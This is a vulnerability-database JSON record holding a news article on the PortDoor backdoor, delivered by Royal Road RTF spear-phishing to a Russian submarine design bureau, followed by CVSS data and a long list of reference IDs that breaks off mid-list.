DATABASE RESOURCES PRICING ABOUT US

{"id": "THN:8EAD85C313EF85BE8D38BAAD851B106E", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "New Chinese Malware Targeted Russia's Largest Nuclear Submarine Designer", "description": "[](<https://thehackernews.com/images/-eih1k3cYVhA/YI-naR8atLI/AAAAAAAACbU/NvYXtTt5zpkVcilfqrwOd5oadfGSEyNuQCLcBGAsYHQ/s0/hacking.jpg>)\n\nA threat actor believed to be working on behalf of Chinese state-sponsored interests was recently observed targeting a Russia-based defense contractor involved in designing nuclear submarines for the naval arm of the Russian Armed Forces.\n\nThe phishing attack, which singled out a general director working at the Rubin Design Bureau, leveraged the infamous \"Royal Road\" Rich Text Format (RTF) weaponizer to deliver a previously undocumented Windows backdoor dubbed \"**PortDoor**,\" according to Cybereason's Nocturnus threat intelligence team.\n\n\"Portdoor has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more,\" the researchers [said](<https://www.cybereason.com/blog/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector>) in a write-up on Friday.\n\nRubin Design Bureau is a submarine design center located in Saint Petersburg, accounting for the design of over [85% of submarines](<https://ckb-rubin.ru/en/company_profile/>) in the Soviet and Russian Navy since its origins in 1901, including several generations of strategic missile cruiser submarines.\n\n[](<https://thehackernews.com/images/-LhySSop9zLA/YI-dzc0pM9I/AAAAAAAACbM/Nhsd5V7X3tY_t7UM4MzbcCyd6fxoRAV1ACLcBGAsYHQ/s0/hacking.jpg>) \n--- \nContent of the weaponized RTF document \n \nOver the years, Royal Road has earned its place as a [tool of choice](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>) among an array of Chinese threat actors such as Goblin Panda, Rancor Group, TA428, Tick, and Tonto Team. Known for exploiting multiple flaws in Microsoft's [Equation Editor](<https://www.anomali.com/blog/multiple-chinese-threat-groups-exploiting-cve-2018-0798-equation-editor-vulnerability-since-late-2018>) (CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802) as far back as late 2018, the attacks take the form of targeted spear-phishing campaigns that utilize malicious RTF documents to deliver custom malware to unsuspecting high-value targets.\n\nThis newly discovered attack is no different, with the adversary using a spear-phishing email addressed to the submarine design firm as an initial infection vector. While previous versions of Royal Road were found to drop encoded payloads by the name of \"8.t,\" the email comes embedded with a malware-laced document, which, when opened, delivers an encoded file called \"e.o\" to fetch the PortDoor implant, implying a new variant of the weaponizer in use.\n\nSaid to be engineered with obfuscation and persistence in mind, PortDoor runs the backdoor gamut with a wide range of features that allow it to profile the victim machine, escalate privileges, download and execute arbitrary payloads received from an attacker-controlled server, and export the results back to the server.\n\n\"The infection vector, social engineering style, use of RoyalRoad against similar targets, and other similarities between the newly discovered backdoor sample and other known Chinese APT malware all bear the hallmarks of a threat actor operating on behalf of Chinese state-sponsored interests,\" the researchers said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-05-03T07:34:00", "modified": "2021-05-03T16:14:45", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 9.3}, "severity": "HIGH", "exploitabilityScore": 8.6, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": true}, "cvss3": {"cvssV3": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://thehackernews.com/2021/05/new-chinese-malware-targeted-russias.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"], "immutableFields": [], "lastseen": "2022-05-09T12:38:16", "viewCount": 956, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:0B0854A8-58D2-4F1A-BC91-A6826E1A8548", "AKB:6AB45633-1353-4F19-B0F2-33448E9488A2", "AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:5FC3EC6D315A733A8D566BD7A42A12FE", "CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD", "CARBONBLACK:F099654AA95F6498DB33414802DBA792", "CARBONBLACK:F60F48DF14A6916346C8A04C16AFB756"]}, {"type": "cert", "idList": ["VU:421280"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-1009", "CPAI-2018-0018", "CPAI-2019-0847"]}, {"type": "cve", "idList": ["CVE-2017-11882", "CVE-2017-11884", "CVE-2018-0798", "CVE-2018-0802"]}, {"type": "exploitdb", "idList": ["EDB-ID:43163"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:DFB2E04F89F872DFEF75605BCC9072DB"]}, {"type": "fireeye", "idList": ["FIREEYE:327A8F88F73C7D036A5D128A75C86E11", "FIREEYE:78657FD52E5CBE87FE2D0019439691A0", "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "FIREEYE:8926956380F9C38D0DE9955F5D9CBE06", "FIREEYE:8DF2C812CF325AAB2F348273A03789F5", "FIREEYE:96525D6EA5DBF734A371FB66EB02FA45", "FIREEYE:A819772457030262D1150428E2B4438C", "FIREEYE:DE7D327A091FDB2A6C8A4AF7B6F71076", "FIREEYE:ECB192E6133008E243C5B5CB25D9C6DD"]}, {"type": "hivepro", "idList": ["HIVEPRO:911A69A767BEAA3AE3152870FD54DF6F"]}, {"type": "kaspersky", "idList": ["KLA11139", "KLA11170"]}, {"type": "krebs", "idList": ["KREBS:4F19DF7091060B198B092ABE2F7E1AA8"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1AE2302579AF5E9849B438BD21910FB8", "MALWAREBYTES:30BC856501B7BB42655FA3109FACCA26", "MALWAREBYTES:4F1B52F3E373AB0DA5BF646A554AEE8D", "MALWAREBYTES:68B17F5C372DE1EBC787E579794B6AD9", "MALWAREBYTES:775442060A0795887FAB657C06773723"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-FILEFORMAT-OFFICE_MS17_11882-"]}, {"type": "mscve", "idList": ["MS:CVE-2017-11882", "MS:CVE-2018-0798", "MS:CVE-2018-0802"]}, {"type": "mskb", "idList": ["KB2553204", "KB3162047", "KB4011262", "KB4011276", "KB4011574", "KB4011580", "KB4011604", "KB4011607", "KB4011610", "KB4011618", "KB4011643", "KB4011651", "KB4011656", "KB4011658", "KB4011659"]}, {"type": "mssecure", "idList": ["MSSECURE:C3D318931D83D536C01D2307EBC0B3B0", "MSSECURE:DF21D5BD34E334683F0DCC4F64FDC83E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201891024", "MYHACK58:62201891962", "MYHACK58:62201892253", "MYHACK58:62201892510", "MYHACK58:62201994299", "MYHACK58:62201994516"]}, {"type": "nessus", "idList": ["SMB_NT_MS17_NOV_OFFICE.NASL", "SMB_NT_MS18_JAN_OFFICE.NASL", "SMB_NT_MS18_JAN_OFFICE_COMPATIBILITY.NASL", "SMB_NT_MS18_JAN_WORD.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310812083", "OPENVAS:1361412562310812148", "OPENVAS:1361412562310812202", "OPENVAS:1361412562310812209", "OPENVAS:1361412562310812607", "OPENVAS:1361412562310812614", "OPENVAS:1361412562310812618", "OPENVAS:1361412562310812623", "OPENVAS:1361412562310812624", "OPENVAS:1361412562310812708", "OPENVAS:1361412562310812711", "OPENVAS:1361412562310812730", "OPENVAS:1361412562310812731"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:145226"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:97274435F9F49556ED060635FD9081E2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "securelist", "idList": ["SECURELIST:03923D895F0F0B7EB3A51F48002D1416", "SECURELIST:0EC04669D1B4F9900C7ED36BB8AFB1A2", "SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:163368D119719D834280EA969EDB785D", "SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E", "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "SECURELIST:2625ABE43A309D7E388C4F0EBCA62244", "SECURELIST:2E379BD626ECA8E38B18EDCA6CD22F3C", "SECURELIST:322E7EEAE549CDB14513C2EDB141B8BA", "SECURELIST:375240F06A95008FE7F1C49E97EEC5AF", "SECURELIST:3DB11A5605F77743FA5F931DF816A83C", "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "SECURELIST:45BAFC60F3E2EFDD0D35C99D042559B4", "SECURELIST:48D15DFCBE9043594D59B08C3C4F3A21", "SECURELIST:4A1162E18E20A1A1E0F057FE02B3AE75", "SECURELIST:53EC9FA168E0493828018AA0C1B799C0", "SECURELIST:5F58A2B6A05CED1E343735029CE88CC2", "SECURELIST:652E2EF2009E38562770BCAC629BEA2E", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:833C831E498502BB46DD03F0C6F4D597", "SECURELIST:934E8AA177A27150B87EC15F920BF350", "SECURELIST:967D8B65D5D554FFB5B46411F654A78A", "SECURELIST:9B6F07B15AEDE81CE353FC4D91FF6329", "SECURELIST:9CEE13B3A189B3DBB187C6946786F480", "SECURELIST:A2A995C1C898D3DA4DB008FBA6AA149E", "SECURELIST:A3CEAF1114E104F14254F7AF77D7D080", "SECURELIST:A4072107882E39592149B0DB12585D70", "SECURELIST:A9EBC6A1BD7D7A743024BD012EAC8323", "SECURELIST:AFE852637D783B450E3C6DA74A37A5AB", "SECURELIST:B7116025A4E34CF6B9FED5843F7CDCD4", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:CE954DA57A5EE857B62F0E00D36A5003", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "SECURELIST:DA58D4888BE428D1D0C529B16E07E85D", "SECURELIST:E9DB961C0B1E8B26B305F963059D717E", "SECURELIST:F1FC61836DCAA7F1E27411092B208523", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "symantec", "idList": ["SMNTC-101757", "SMNTC-102347", "SMNTC-102370"]}, {"type": "talosblog", "idList": ["TALOSBLOG:3E4DED1D580BBFDD5A456042C03F6483", "TALOSBLOG:5AED45D6F563E6F048D9FCACECC650CC", "TALOSBLOG:7F660B8BF6BF1461DC91FBA38C034D9A", "TALOSBLOG:809E263C085A7EC5D9424905C6E4ACA8", "TALOSBLOG:906482C918479D3D0C5D654DF6CC9FED", "TALOSBLOG:9F3650D77DE88BE04EFECD8F54CE0BE1", "TALOSBLOG:A69C35FFFCE6FA744216C7784C7D2148", "TALOSBLOG:C840FAF5403868E1730CD6FB8F3F09E6", "TALOSBLOG:CDA48DA087B7839DDC1F8E0F4281D325", "TALOSBLOG:D034163DF19149D9BA90463DA51A05F9", "TALOSBLOG:E17B2B34420CA9C9A1CD5E1FE7980D8C", "TALOSBLOG:EC1B279A70AF41A51CBB4EB4722EFA46", "TALOSBLOG:FAB75C531A83C576A2D8274490FF6114"]}, {"type": "thn", "idList": ["THN:125A440CBDB25270B696C1CCC246BEA1", "THN:33C1B889CF989DEEEDFD8271BE2B363A", "THN:3A9F075C981951FC8C86768D0EF1794A", "THN:42E3306FC75881CF8EBD30FA8291FF29", "THN:7489F5CF1C31FDAC5F67F700D5DDCD5B", "THN:75586AE52D0AAF674F942498C96A2F6A", "THN:81AA37DC2B87520CB02F3508EF82AABD", "THN:96CCD36932DBF3F5BEFCC18D4EC4E5C2", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:C21D17F1D92C12B031AB9C761BBD004A", "THN:C473C49BA4C68CD048FB1E0B4A2D04F4", "THN:CBEFDC179819629DFFC0C17341BFD3E8", "THN:D31D6F701E39475F33D37784AE99E07E", "THN:DADA9CB340C28F942D085928B22B103F", "THN:E50F78394BCAE6FF3B8EE8482A81A3C4", "THN:ED087560040A02BCB1F68DE406A7F577", "THN:FBCEC8F0CE0D3932FE4C315878C48403"]}, {"type": "threatpost", "idList": ["THREATPOST:00E7F3B203C0A059EA3AE42EEFDA4BF6", "THREATPOST:01085CB521431ED10FF25B00357004A0", "THREATPOST:011D33BB13274F4BC8AF713F8EBEC140", "THREATPOST:0234DE925A24BDFF85D569B0592C4E40", "THREATPOST:0273E2F0D7B4CECA41893B066B3C2D24", "THREATPOST:027F94626186E3644FA6008B6B65879D", "THREATPOST:02A26476FD54111CFB779DB36CA0BE95", "THREATPOST:037D55F658239A9DBF47BABD04D1F6E7", "THREATPOST:03F3C45744F6C52E1687C208288C7001", "THREATPOST:04738138B50414CEACDB62EFA6D61789", "THREATPOST:04FAA050D643AD8D61D8063D5232A682", "THREATPOST:051AFF295EB4024C33B9C6988E0F5C34", "THREATPOST:05856E5CAEC60A0E16D4618496270D44", "THREATPOST:05A74488EF15AE2BEA20C34AC753FB10", "THREATPOST:05CA5F0BEDE4AEE08ED1C40F6D413601", "THREATPOST:06F9A4BBE673BFFA63BB435F99387C6D", "THREATPOST:07E70978E087406E6779D5EE8D2D372D", "THREATPOST:088C4C91495F7C7262D861A66DC74B85", "THREATPOST:0A40F95A480060B254A1AA6FCF9504B2", "THREATPOST:0ACA8133652DA5D5C5D027A4F9EED75A", "THREATPOST:0B64A7C04FF47971B650E17B53C45FD2", "THREATPOST:0BA7B2FCC73EB6AA27E7D15318D8DCEF", "THREATPOST:0C5877DE6DD50B0CB309505FAE7076AC", "THREATPOST:0D250E6E576E1C05274E04DB1BB79529", "THREATPOST:0DD2574E8237EB5925DD5C2AC8B9A426", "THREATPOST:0E875F36B37069C0CA4DC570FE3BD197", "THREATPOST:0ECD1B8BDCF9CD65F10B363FC3FDABA9", "THREATPOST:0F2DE86E0069A54E56B0694DA999399A", "THREATPOST:0FEEF48E09B4F6AB583220AF2A1CCE70", "THREATPOST:105BBC66E564BD98581E52653F5EA865", "THREATPOST:1071D90B9DDF02B6FC796EE160E0AFDD", "THREATPOST:11053DD231ACA5F34708B38E7E96AE9F", "THREATPOST:1109584452DBA30B86EF68E3277D4E39", "THREATPOST:11A212CE63E0ED8390DF014E511EC174", "THREATPOST:1256E9A9997A1C51E9DB7AEB7A420D3D", "THREATPOST:1327F2449E675DB6F1F90EDB766B1DC8", "THREATPOST:14171FFFDCB402F0E392DA20B23E7B5A", "THREATPOST:14B2B02CB661C8C7E1BC1204495F0D25", "THREATPOST:14FF20625850B129B7F957E8393339F1", "THREATPOST:1663F2C868E9B0A3184989EAF71EB3DA", "THREATPOST:17ABCE7BEBAC56FCA5601686C9601728", "THREATPOST:17AC167B3F04D3043199819655CB5EB8", "THREATPOST:195656DFCDBB1B18C4B0E899AA2C96DE", "THREATPOST:19F6727A0DB5ECAEB57AFC56191A2EC4", "THREATPOST:1B56CE326878B69FFA20FFC20DB62365", "THREATPOST:1B75EB23D874C5D85DA6FEAB65007B4E", "THREATPOST:1BC8168472B040DAEF3D3D5CCC865068", "THREATPOST:1BCC479A05BA19E3B4906CB5F5FD2F1B", "THREATPOST:1C5C89106D8897D6CDDFF572948A779A", "THREATPOST:1D743B7D5397A9D33A091396D1D95BDB", "THREATPOST:1E11FA7540C2CE7C48832A342FAAB3A8", "THREATPOST:1F7B99C76055BD44C266432644E6B9CB", "THREATPOST:1FA77776DEE21633617B7B927000ADBF", "THREATPOST:1FB92D9630590CC17FF00234FF9991FF", "THREATPOST:1FDD4D6EFB350CC9F6F42A5514AA6849", "THREATPOST:20A9D9F111F89A61A6242B788FCF6209", "THREATPOST:212ACE7085CC094D6542F00AF0A4D1B4", "THREATPOST:21439BDD06D57894E0142A06D59463B5", "THREATPOST:215398BCE165265631436077B4E79ECB", "THREATPOST:222B126A673B8B22370D386B699A7F90", "THREATPOST:247A5639B207C2C522F735B0C3412087", "THREATPOST:26EDD0A7C1914DBF0CFE32B0877BE5A7", "THREATPOST:270516BE92D218A333101B23448C3ED3", "THREATPOST:27F2EB604A7262CA0448D6463BA3B2A4", "THREATPOST:27F8092D2D7E88CBD23EAF8A7A016E24", "THREATPOST:28D790372A5C9EB1083AA78A4FDF3C0E", "THREATPOST:28E43852D5120A3EC8F4720244E0C432", "THREATPOST:29E9543F6EC7903A34D286C6F4391368", "THREATPOST:2A42363A8B070949A25091DE7946F5A2", "THREATPOST:2AFE9BC25DD41D9CF073C8C04B0B1879", "THREATPOST:2C798ED7D1CE36B13D82410EA1C94D9F", "THREATPOST:2CE017994C889322A1BF0C3F3521DFD7", "THREATPOST:2D616CF8D8ED2AEB6805F098560269CB", "THREATPOST:2DAD0426512A1257D3D75569F282640E", "THREATPOST:2E13C5A3F37F020F188FBBE61F9209BC", "THREATPOST:2F3319136B672CD9E6AB9A17CE42DF1B", "THREATPOST:30DA1C9D6157103537A72208FA5F0B5D", "THREATPOST:30F4296B03191B6F9433E5DFA9CEBFE6", "THREATPOST:326CCB6EA4E28611AD98B1964CFEE88E", "THREATPOST:3283173A16F1E86892491D89F2E307C2", "THREATPOST:334259E5C4B157E6AC8ADC754BD30D4F", "THREATPOST:35BD4DEE5D1763F5788A6BD1F6AEB00D", "THREATPOST:370DCA5103923FA8965F6D8890D4198F", "THREATPOST:37854AF8C9A75E43ACA98BD95205B6BC", "THREATPOST:379EB96BF0EAF29DD5D3B3140DEF25F5", "THREATPOST:384A1D8040B61120BE2BA529493B9871", "THREATPOST:392CE26C2E3587A54C58FBEC0E26729F", "THREATPOST:3973FA851D33322A013EA1314A1AACC7", "THREATPOST:3AADA643D0F6F1FA8E04B9E2C9F0354B", "THREATPOST:3B27D34858D1F6DE1183C9ABEE8643CD", "THREATPOST:3BA8475F97E24074B27812B9B24AD05F", "THREATPOST:3BDDDA913AECAA168F2B8059EF6BF25A", "THREATPOST:3D0B017E262134B8D61E195735411E8A", "THREATPOST:3D30F37EC2CC17D6C3D6882CF7F9777E", "THREATPOST:3D7F98274EE0CEFF5B22DA72598BE24B", "THREATPOST:3E3C8752E39F7A8CA5DD91BD283A79E7", "THREATPOST:3F9DD13AA9EC2148FD8D14BD00233287", "THREATPOST:40C7024941C4F0096D439BD79BF49C6D", "THREATPOST:415E19FC1402E6223871B55143D39C98", "THREATPOST:42533F5A68FABB4F312743C2E2A1262A", "THREATPOST:426AA248C0C594BAA81FC6B16FD74B7F", "THREATPOST:42FDB1238D348C4F4A1074DB3091E6F2", "THREATPOST:43B03902EBB289EABEA3B61E32BF7B7B", "THREATPOST:43C7C5989C2358091F5FA33D11480AEB", "THREATPOST:43EF6CEDCAE06DF2760527AA36C42994", "THREATPOST:44C6EDF349E9D3038D1847321D79E4DF", "THREATPOST:44C93D75841336281571380C5E523A23", "THREATPOST:44FF4D429457B43FB0FEA96C9A0DE58C", "THREATPOST:45A8572FB3BCE9303EDEE2A4783994E3", "THREATPOST:4622EF32C9940819EDA248FBC9C1F722", "THREATPOST:483C67752109A3C6AF1920AEA0F63B4C", "THREATPOST:49045E816279C72FD35E91BF5F87387C", "THREATPOST:490FB5EEC7306F4AF2F0990C85BAB0EC", "THREATPOST:49E24C3D272F18F81C1E207E97168C33", "THREATPOST:4A51D32AF6E154B536858044A8667E45", "THREATPOST:4AB3E2B46281B3DB5FFB51D8F16A11EC", "THREATPOST:4ABC0C904122EBC91D19E8F502931126", "THREATPOST:4AFBF9284A6902E941BE6D95BCD2052E", "THREATPOST:4BAED737182ECF19718520A7258DFDAA", "THREATPOST:4C1556375D297ECC5389073B3ECC185E", "THREATPOST:4C788DAABFE70AE1D1483D4039B3767E", "THREATPOST:4D225F38F43559CB340E0C0C20E1C9BD", "THREATPOST:4DF584EB3FA47CA6245D964EA2A1A2FB", "THREATPOST:4E345D523AA3EF8D5D06880D1063B0C6", "THREATPOST:4F6F13C74BC6E5EC3C5FF0600F339C90", "THREATPOST:4FA617D4BE1CFDFB912E254229B94E61", "THREATPOST:5083983BB9656C8F9FD41E7297B634C9", "THREATPOST:5170E663982119D9A7AA4064EC71D01D", "THREATPOST:5196DBE4ABD34424DF1F07ED3DA73B12", "THREATPOST:519B278A52BA4200692386F6FAEA43B1", "THREATPOST:519EDC580FCA347C035738F51DB2ABE3", "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "THREATPOST:5223DD87C6EE62FB7C3723BCCF670612", "THREATPOST:537857B2E29A08953D50AC9EDE93162F", "THREATPOST:537A21C79E24E9981AD8200320B7D46F", "THREATPOST:542C0B0D14A54FEF96D5035E5ABEFEDF", "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "THREATPOST:55873F60362AA114632D0D7DC95FF63C", "THREATPOST:5679ACC257BEC35A3A300F76FA78E8E6", "THREATPOST:580280FBECF50DF8FF68F3A998F311D3", "THREATPOST:59732F848538CA26FD0A3AC638F529F9", "THREATPOST:59C4483705849ADA19D341EFA462DD19", "THREATPOST:5A63035EF0BF190E58422B3612EB679F", "THREATPOST:5B1F1A9A61354738E396D81C42C0E897", "THREATPOST:5BA927C1BD88B4949BDAEC1ACC841488", "THREATPOST:5C4C4351A746ADF8A7F1B2D316888C01", "THREATPOST:5C60BA94DEDFC24233F8B820C7D23076", "THREATPOST:5D03FA1B3C642C5317FB96AFA476DDFA", "THREATPOST:5D9785F30280BD09EB7E645CA2EECE79", "THREATPOST:5DA1737F4321D42086053820C84CCFB0", "THREATPOST:5E4874778A3B5A26CF2755C59BA3A7A8", "THREATPOST:616358A88F9C1E69920585FDC717CF1F", "THREATPOST:619AA46DE90E000F02F634A9AA0FB8B0", "THREATPOST:61AC6ABD7798785567FFEEBEF573CDF8", "THREATPOST:61F350907297E5B2EBAE56FF04C054C7", "THREATPOST:6232FE8F8C59D8BBBD6CD0EAAD3D4AA3", "THREATPOST:63188D8C89FE469962D4F460E46755BC", "THREATPOST:632A7F4B404E8A9E7D49A4895D573FDB", "THREATPOST:639050E94B84AD3926F64EF305F67AB4", "THREATPOST:63EC8A47C53B47DB10146ABB77728483", "THREATPOST:6456A6FCBD57F31DF6ECF8310230973D", "THREATPOST:64EE7E2569B19CDBC1F2000D27D9FC06", "THREATPOST:65B7931A3E49BA24F11CA0CB09743AEA", "THREATPOST:66D2F7851992FD5FC9934A5FE7A68E9F", "THREATPOST:68D1078BB418B06D989E65C3972EDE28", "THREATPOST:6968030EBEDCF665121F267E466D3BA5", "THREATPOST:69A935F9472525B2FDE94FC33D6C6B70", "THREATPOST:6B8C9E983349C1AA69D5488866DAAC1D", "THREATPOST:6B96C89C11F9A7363A1E592863892D36", "THREATPOST:6C3F577E27FFC413E4196C31436CE13A", "THREATPOST:6C50260122AE142A1AA28DCFDE4EA98B", "THREATPOST:6CF438E98DFFF4B4057CAFB1382A4D3C", "THREATPOST:6E19885760DF8E9DD66B4F30158CD173", "THREATPOST:6E270592F88355DEABA14BF404C7EDDE", "THREATPOST:6E2DD8B76555337B1AB3A01AE147EA68", "THREATPOST:6E46A05627B4B870228F4C53DD7811AE", "THREATPOST:6EBEA4CC58A28C7B7DEE65B4D6FDA976", "THREATPOST:70B08FC40DE9224ACE3D689EE22897C0", "THREATPOST:714DD68C5B32F675D9C75A67D7288B65", "THREATPOST:71D015FE251ED550B92792FF72430841", "THREATPOST:738BF7215D8F472D205FCBD28D6068E5", "THREATPOST:742E793D712CB6B2F049DBEA5373016E", "THREATPOST:75108516B2230B2FA175C2B84083F4DF", "THREATPOST:752864660896CF677AF67798E68952F0", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:7642BB12A1C6458D5DDB7202B6BF1D62", "THREATPOST:765141925BCF61E1BEC4EA2E7E28C380", "THREATPOST:769E9696F176FD575D7F365CA771EFC3", "THREATPOST:77E27FE5A07B4C4146B818CE438E0AAA", "THREATPOST:78B8BC1F232A077BA4B03580A37C0780", "THREATPOST:78CC95FFED89068ABD2CBA57EFE1D5F8", "THREATPOST:7957677E374E9980D5154F756D4A2E00", "THREATPOST:7A640DBB2223135AD8DC65457AB55EBF", "THREATPOST:7ACEE8004906A83F73EF46D8EE9A83F3", "THREATPOST:7BE818C547990FA7A643DE9C0DE99C8C", "THREATPOST:7D0B88F224FD59AB5C49F030B02A25D9", "THREATPOST:7D2F975F60C58181C3B6726E809F10FD", "THREATPOST:7D30EC4B25275AFBC409D8619D125E65", "THREATPOST:7D43FDAB0FB38B20FBB86FFF6FD31270", "THREATPOST:7E30033E60118E5B4B8C14689A890155", "THREATPOST:7E324E4AFB9218DCC9509FB4E2277400", "THREATPOST:7F4C76F7EC1CB91B3A37DE64274F1EC3", "THREATPOST:7F86D903184A4B5AF689693F5950FB7D", "THREATPOST:7FF462EBFF86BEB1E7C8207D6CB07E50", "THREATPOST:7FFF8255C6708C32B41A2B0FBFEBA9B0", "THREATPOST:80110ABE631D4720D6EECA161FFCE965", "THREATPOST:80978215EBC2D47937D2F3471707A073", "THREATPOST:809BED35A98A53099CE1EC723FA950F2", "THREATPOST:80D12F3888B999E484D206D5EBA9EEA0", "THREATPOST:828471E05035E11C0ED67C67E1EA8F0D", "THREATPOST:848870C5AD3BB637321291CEF571A5F9", "THREATPOST:8549E725CF51C109F7299A0CC5FACBE9", "THREATPOST:856DD01A5D951BB0E39AE06B64DDD2A7", "THREATPOST:85DCC5523A4DCF507633F07B43FE638A", "THREATPOST:85DEC97DDAF4F3EBF731C2724329904B", "THREATPOST:8836AC81C1F2D9654424EC1584E50A16", "THREATPOST:88A5449B2DE22E7A3AD1C820BEDE1109", "THREATPOST:8A24910206DA1810DAD81ABA313E33A7", "THREATPOST:8BA8EF04040D5048287D9AFFAD778130", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:8D91C617AB6DA9813465DF309507F9F5", "THREATPOST:8E01B2E26F588D0FA5B0857DCEF926DA", "THREATPOST:8EC1069E3114E28911EA3438DA21B952", "THREATPOST:8F39618B0CB625A1C4FC439D0A7C4EB9", "THREATPOST:8FAA8C7C7378C070F0011A0B44C03726", "THREATPOST:8FACBD9A4509F71E19E07BB451FD68A0", "THREATPOST:90355E85731E1618F6C63A58CD426966", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:945830C59DF62627CC3D29C4F9E9139F", "THREATPOST:945A12FF5F8B6420706F2E174B6D0590", "THREATPOST:95C6723464FA4BDF541640AC24DD5E35", "THREATPOST:967CD2B765C5CD02EC0568E4797AF842", "THREATPOST:96B85F971B8102B581B91984548004F2", "THREATPOST:96C5FAF7B7238F498D3BFD523344AA56", "THREATPOST:9758835CBD1761636E1E39F36A79936B", "THREATPOST:9812AA10EEA208EA87CD37C5F28D927F", "THREATPOST:985009AC9680D632153D78707A8949EF", "THREATPOST:98BE42759F35CD829E6BD3FAC7D5D1D5", "THREATPOST:9A9D21304DF605E55290BEAB2BDF62C5", "THREATPOST:9AA382E93ED0C2124DD69CF4DDC84EB7", "THREATPOST:9AE8698D8AABA0F11676A29CECC6D7BA", "THREATPOST:9B11E0EF22481CA407924C58E8C7F8C1", "THREATPOST:9B936E81D7DD33C962D98A85BAF3B7FE", "THREATPOST:9C03EBE552C67EF6E62604A81CF13C1A", "THREATPOST:9C0FA678FF748B08478CA83EAAEF83B4", "THREATPOST:9D048A14622014274EB5C5D19FEDD46A", "THREATPOST:9DAD31CF008CF12C5C4A4EA19C77BB66", "THREATPOST:9E1DE5C0DB7F1D8747AD52E14E4C8387", "THREATPOST:9FE968913EDA58B2C622DFD4433C05E0", "THREATPOST:A054939E56572665B8DD31C2FF1D6A79", "THREATPOST:A0EA2808DE56569B593A4E0254EC09CD", "THREATPOST:A1A03F8D19A1212209F2765F29BE892C", "THREATPOST:A21BD1B60411A9861212745052E23AE7", "THREATPOST:A29172A6F4C253F7A464F05CCE4E3ABB", "THREATPOST:A2C4DFB7FD998E1990946FBDE70D8050", "THREATPOST:A2FCDF5F534EC09A258F3193FDEA41A8", "THREATPOST:A3218B82F449C5905D1957A1C264C1C1", "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "THREATPOST:A60A7647981BC9789CAECE6E9BADD30E", "THREATPOST:A653527FBB893B6568AF6B264422BD7A", "THREATPOST:A6CEBF30D4D0B3B54DC8E78CC21EBA4B", "THREATPOST:A7710EFC5AA842A252861C862A3F8318", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:A7D014F320A68BD2D7BEA7FCB9349FC0", "THREATPOST:A824AE46654142C5CE71C8DDFD90D548", "THREATPOST:A844D1411E7339911EECDDBD5596A9E7", "THREATPOST:A959F2AFFE1161A65066EACCFB0D5FCA", "THREATPOST:A9E6DBBE61D0494D0B0C83151FEC45D0", 